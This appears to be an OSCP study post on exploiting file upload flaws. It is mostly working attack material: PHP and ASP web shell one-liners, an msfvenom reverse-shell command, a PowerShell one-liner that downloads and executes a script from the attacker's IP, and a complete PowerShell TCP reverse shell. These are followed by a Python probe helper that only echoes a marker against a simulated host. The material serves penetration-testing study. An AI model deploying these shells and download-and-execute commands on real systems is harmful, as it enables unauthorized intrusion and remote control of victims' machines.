Tag: OSCP

1 Post

File Upload Vulnerability
Web Shell Upload

Web Shell

Check the programming language of the web app: enumerate common index page extensions (index.php, index.asp, index.aspx, index.jsp) or use Wappalyzer.

Write a basic web shell payload in that language to check whether the upload handler applies any validation and whether uploaded files are actually executed, for example:

<?php echo file_get_contents('/etc/passwd'); ?>
<?php system('hostname'); ?>
<?php system($_REQUEST['cmd']); ?>
<% eval request("cmd") %>

(Note: in classic ASP a single quote starts a comment, so the request parameter must be written with double quotes.)

Tools for opening a web shell: phpbash, SecLists (PHP), Antak Webshell (ASPX).

Reverse Shell

Main idea: use the web shell to make the target machine initiate a connection back to the pentester's machine, which gives an interactive terminal on the target even when inbound connections to it are filtered.

Tools for opening a reverse shell: php-reverse-shell.

Generate a reverse shell with msfvenom:

msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

Reverse shell for Windows. PowerShell one-liner that downloads a script from the attacker's host and executes it in memory (the filename in the URL must match the script you serve):

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173/ps.ps1')"

Contents of backdoor.ps1 (a TCP reverse shell that reads commands, runs them with iex and writes the output back):

$client = New-Object System.Net.Sockets.TCPClient('192.168.45.173',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Command…
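The two checks the excerpt describes (fingerprint the server-side language from index page extensions, then upload a minimal payload to learn whether uploads are filtered and whether they execute) as an added Python example. This is not code from the original post. The HTTP transport is injected so the logic runs offline against a constructed fake host; the endpoint paths `/upload` and `/uploads/`, the form field names `name`/`content`, and the `FakePhpHost` class are all assumptions for illustration and must be adapted to a real target. The probe only echoes a random marker rather than running a command, so the "executed" versus "served as text" distinction is visible before any real shell is dropped.

```python
import re
import uuid

# Index-page extension -> server-side language (the fingerprint step).
INDEX_EXTENSIONS = {"php": "php", "asp": "asp", "aspx": "aspx", "jsp": "jsp"}

# Harmless probe per language: it only echoes a random marker, so the
# response tells "executed" from "served as text" before any command runs.
PROBE_TEMPLATES = {
    "php":  "<?php echo '{m}'; ?>",
    "asp":  '<% Response.Write("{m}") %>',
    "aspx": '<% Response.Write("{m}") %>',
    "jsp":  '<% out.print("{m}"); %>',
}


def fingerprint_language(transport, base="/"):
    """Request index.<ext> for each known extension; the first 200 wins.
    transport(method, path, data) -> (status, body) is injected so the
    logic is testable offline. Returns the language name or None."""
    for ext, lang in INDEX_EXTENSIONS.items():
        status, _ = transport("GET", f"{base}index.{ext}", None)
        if status == 200:
            return lang
    return None


def probe_payload(lang, marker):
    return PROBE_TEMPLATES[lang].format(m=marker)


def check_upload(transport, lang, upload_path="/upload", served_dir="/uploads/"):
    """Upload a marker-echo probe and fetch it back. Assumed endpoints:
    POST /upload with {"name", "content"}, files then served under
    /uploads/<name>. Adjust both to the real application."""
    marker = "probe-" + uuid.uuid4().hex
    name = f"probe.{lang}"
    status, _ = transport("POST", upload_path, {"name": name, "content": probe_payload(lang, marker)})
    if status != 200:
        return {"uploaded": False, "executed": False, "reason": f"upload rejected ({status})"}
    status, page = transport("GET", served_dir + name, None)
    if status != 200:
        return {"uploaded": True, "executed": False, "reason": f"file not reachable ({status})"}
    # Executed: only the marker comes back. Served as text: the source
    # (with its <? / <% tags) comes back, marker included.
    if marker in page and "<?" not in page and "<%" not in page:
        return {"uploaded": True, "executed": True, "reason": "marker echoed, uploads are executed"}
    return {"uploaded": True, "executed": False, "reason": "file served as text, not executed"}


class FakePhpHost:
    """Constructed stand-in for a PHP app, used only so the helpers run
    offline. `executes` toggles whether uploaded .php runs or is served
    as text; `blocked_exts` models a denylist on the upload handler."""

    def __init__(self, executes=True, blocked_exts=()):
        self.executes = executes
        self.blocked_exts = set(blocked_exts)
        self.files = {}

    def __call__(self, method, path, data):
        if method == "GET" and path == "/index.php":
            return 200, "<html>home</html>"
        if method == "POST" and path == "/upload":
            if data["name"].rsplit(".", 1)[-1] in self.blocked_exts:
                return 403, "forbidden"
            self.files[data["name"]] = data["content"]
            return 200, "ok"
        if method == "GET" and path.startswith("/uploads/"):
            name = path[len("/uploads/"):]
            if name not in self.files:
                return 404, ""
            src = self.files[name]
            if self.executes and name.endswith(".php"):
                m = re.search(r"echo '([^']*)'", src)  # emulate the interpreter
                return 200, (m.group(1) if m else "")
            return 200, src
        return 404, ""


if __name__ == "__main__":
    for host in (FakePhpHost(), FakePhpHost(executes=False), FakePhpHost(blocked_exts=("php",))):
        lang = fingerprint_language(host)
        print(lang, check_upload(host, lang))
```

Against a real target, replace the fake host with a small wrapper around `requests` that returns `(status, body)` and point `upload_path`/`served_dir` at the application's actual upload form and storage location; the three outcomes (rejected, stored but served as text, executed) tell you whether to move on to extension or content-type bypasses, look for a different storage path, or proceed to a real shell.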